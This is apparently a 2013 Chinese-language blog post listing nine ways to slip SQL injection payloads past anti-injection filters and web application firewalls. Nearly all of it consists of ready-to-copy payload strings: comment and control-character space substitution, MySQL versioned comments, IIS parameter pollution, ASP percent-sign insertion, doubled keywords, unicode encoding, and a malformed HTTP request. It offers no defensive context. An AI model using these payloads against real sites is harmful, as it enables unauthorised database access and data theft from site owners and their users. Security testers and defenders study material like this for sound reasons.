waf绕过:绕过防注入系统 包括WAF的测试方案集合

发表时间:2013-02-06

======绕过防注入系统,包括WAF的测试代码=======
 
方案一、  把测试代码的空格替换成  /**/  或者+     (注:/**/ 和+ 不要进行url编码)
 
如果要保持原样复制代码,需要双击后,选择代码右键复制即可
01 如: id=1 or 1=1
02 id=1/**/or/**/1=1
03 id=1+or+1=1
 
    
    
方案二、把空格替换成非可见字符    %09 %0A %0D %0B
 
如果要保持原样复制代码,需要双击后,选择代码右键复制即可
01 如: id=1 or 1=1
02 id=1%09or%091=1
03 id=1%0Aor%0A1=1
04 id=1%0A%0Bor%0A%0B1=1
 
    
    
    
方案三、把关键字用 /*!*/包起来,注,这个方法只适用于mysql数据库的站点
 
如果要保持原样复制代码,需要双击后,选择代码右键复制即可
01 如: id=1 and 1=1
02 id=1 /*!and*/1=1
 
    
 
方案四、使用参数污染法攻击绕过,注,该方法只适用于webserver是微软的IIS的情况下
 
如果要保持原样复制代码,需要双击后,选择代码右键复制即可
01 如: id=1 union select 1 from admin
02 id=1 union/*&id=*/select/*&id=*/from/*&id=*/admin
 
    
方案五、使用%绕过,注,该方法只适用于asp/aspx
 
如果要保持原样复制代码,需要双击后,选择代码右键复制即可
01 如: id=1 union select 1 from admin
02 id=1 un%io%n sel%e%ct 1 fr%o%m ad%m%in
 
    
方案六、使用%23 (明文为#号)和%0A配合使用绕过,注,这个方法只适用于mysql数据库的站点
 
如果要保持原样复制代码,需要双击后,选择代码右键复制即可
01 如: id=1 union select 1 from admin
02 id=1%23afafasdf%0Aunion%23afafasdf%0Aselect%23afafasdf%0A1%23afafasdf%0Afrom%23afafasdf%0Aadmin
 
    
方案七、使用重复关键字绕过
 
如果要保持原样复制代码,需要双击后,选择代码右键复制即可
01 如: id=1 union select 1 from admin
02  id=1 ununionion seleselectct 1 frofromm admin
 
   
方案八、使用unicode编码绕过
 
如果要保持原样复制代码,需要双击后,选择代码右键复制即可
01 如: id=1 union select 1 from admin
02  id=1 %u0075%u006e%u0069%u006f%u006e select 1 %u0066%u0072%u006f%u006d admin
 
   
方案九、使用畸形包绕过,只适用于 asp/aspx,详情可以看80sec的站点
 
如果要保持原样复制代码,需要双击后,选择代码右键复制即可
01 如:    id=1 union select 1 from admin
02
03 GET /test.asp HTTP/1.1
04 Host: 172.16.15.50
05 Content-Type: application/x-www-form-urlencoded
06 Content-Length: 15
07
08 t=3*/select/*